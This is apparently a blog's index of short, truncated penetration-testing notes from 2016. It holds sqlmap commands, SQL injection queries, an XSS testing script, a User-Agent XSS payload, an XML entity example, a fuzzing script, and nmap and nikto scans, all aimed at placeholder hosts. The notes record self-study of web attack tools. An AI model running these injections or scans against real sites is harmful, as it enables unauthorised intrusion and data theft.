Compiling 32bit from 64bit Ubuntu(g++)
$ sudo apt-get install build-essential $ sudo apt-get install libc6-dev-i386 $ sudo apt-get install g++-4.8-multilib g++ main.cpp -o main64 g++ -m32 main.cpp -o main32
View Articlewhois Name or service not known
Problem Whois command return “Name or service not known” Solution update the file /etc/resolv.conf nameserver 8.8.8.8 nameserver 8.8.4.4
View ArticleSQL injection tool – sqlmap
Everything here: http://sqlmap.org/ Some examples: ./sqlmap.py -u http://your_page.com/Post/4?orderby=id –dbs ./sqlmap.py -u http://your_page.com/Post/4?orderby=id -D database_name –tables ./sqlmap.py...
View Article#note – 03.11.2016 – nmap, nslookup, searchsploit, DirBuster
TOOLS https://subgraph.com/vega/download/index.en.html https://portswigger.net/burp/download.html http://sqlninja.sourceforge.net/download.html http://www.arachni-scanner.com/...
View Article#note – 09.11.2016 – wireshark
TOOLES https://www.wireshark.org/ If you don’t see all network interface, run app as a sudo. sudo wireshark Wireshark Training...
View Article#note – 10.11.2016 – discover
Discover Script https://github.com/leebaird/discover cd .. cd .. cd opt/ mkdir discover cd discover git clone https://github.com/leebaird/discover /opt/discover/ ./discover.sh
View Article#note – 11.11.2016 – sql injection stuff
SELECT * FROM information_schema.tables; SELECT * FROM information_schema.columns; select table_name from information_schema.tables; select cast(cast(json_agg(table_name) as varchar) as boolean) from...
View Article#note 12.11.2016 – script to test xss vulnerable
xss.py – python import urllib import colorama print('----------- XSS Attack -----------') print('--------- GET URL ATTACK --------') urlFile = "urls.txt" xssPayload = "../_payload/xss_payload.txt" with...
View Article#note 13.11.2016 Directory Traversal Attacks
– https://www.youtube.com/watch?v=jJ0ijQ5pADE –https://www.youtube.com/watch?v=uW1jUxOrHkc – https://www.youtube.com/watch?v=FtOsxFpibJY – https://www.youtube.com/watch?v=_JpewuhzoWo –...
View Article#note 14.11.2016 – information collection
passive whois whois example.com nslookup nslookup > set type=mx > example.com netcraft – http://toolbar.netcraft.com/site_report?url=http://www.wikipedia.org active nmap sudo nmap -sS -Pn -A...
View Article#note – 17.11.2016
– https://www.youtube.com/watch?v=rhGdFpGaOFI – kali linux location of report -> /usr/share/uniscan/report
View Articlepython 3.4 – urllib – delete
# python 3.4 import urllib.request import urllib.parse print('----------- Delete Request -----------') def delete(session_id, postId): print('!! Delete Item !!') headers = { 'Content-Type':...
View Article#note – 19.11.2016
– https://jonathansblog.co.uk/nikto-tutorial-for-kali-linux nikto -Tuning 1 -h example.com nikto -Tuning 4 -h example.com nikto -Tuning 9 -h example.com
View ArticleSQL injection tool – sqlmap – POST – form – login
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" --dbs ./sqlmap.py -u http://example.com/login.php...
View Article#note – Burp Suite
Burp Suite https://portswigger.net/burp/freedownload url: /burp https://www.youtube.com/watch?v=AVzC7ETqpDo&list=PLq9n8iqQJFDrwFe9AEDBlR1uSHEN7egQA Problem with proxy and localhost sudo gedit...
View Article#note – 22.11.2016 – sql injection stuff – mysql
-- original url -- www.your_page.com/account.php?username=xxx -- sql injection test -- www.your_page.com/account.php?username=xxx' -- original query SELECT username, mysignature FROM accounts WHERE...
View Article#note – 23.11.2016
User-Agent Xss POST /blog/post.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 <script>alert('xss')</script>(X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept:...
View Article#note – XML Injection
<?xml version="1.0"?> <!DOCTYPE change-log[ <!ENTITY myName "Michal"> <!ENTITY mySurname "Szalkowski"> ]> <change-log> <text>&myName;...
View ArticleFuzz Discovery Attack
# python 3.4 import urllib.request import urllib.parse import colorama print('----------- Discovery Attack -----------') url = "http://local.host/file.php?page=[PLACEHOLDER].php" payloadFile =...
View Article